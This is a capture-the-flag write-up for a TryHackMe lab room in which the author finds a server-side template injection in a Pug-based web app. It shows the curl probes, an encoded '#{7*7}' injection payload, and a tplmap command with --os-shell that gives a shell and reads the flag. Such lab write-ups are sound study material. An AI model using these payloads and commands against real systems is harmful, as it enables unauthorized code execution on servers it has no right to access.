Here’s a write up for https://tryhackme.com/room/templates
Recon
After starting up the machine, as per instruction there’s a website running on port 5000. In my case:
Click on the Convert to HTML button, it’ll convert the template to HTML.
To make it easier to visualize the request, I replaced the entire content with ‘aaa’, then opened the web console to capture the request.
It was a POST request to /render with payload of ‘template=aaa’.
An equivalent curl command is:
# curl -X POST http://10.10.33.8:5000/render -d 'template=aaa'
<html><head></head><body><pre><x></aaa></pre></body></html>Exploit
A google search of ‘pug template injection’ lead me to this:
To test if the app is vulnerable to SSTI (which was also a hint under ‘similar content’ in the room description), I have used another curl command:
# curl -X POST http://10.10.33.8:5000/render -d 'template=%23%7B7*7%7D '
<html><head></head><body><pre><49> </49></pre></body></html>The command injected the equivalent of {{ 7*7 }}. A vulnerable app will return the result of 7*7, like above.
To exploit, use https://github.com/epinna/tplmap/. Since this is a POST request, you will need a couple more args in the ./tplmap.py command:
./tplmap.py -X POST --engine pug --os-shell -u http://10.10.33.8:5000/render -d 'template=abc'That dropped me in a shell, and the flag was right there :)
linux $ whoami
user
linux $ ls
app.js
flag.txt
node_modules
package-lock.json
package.json
views
linux $ cat flag.txt
flag{the-hash}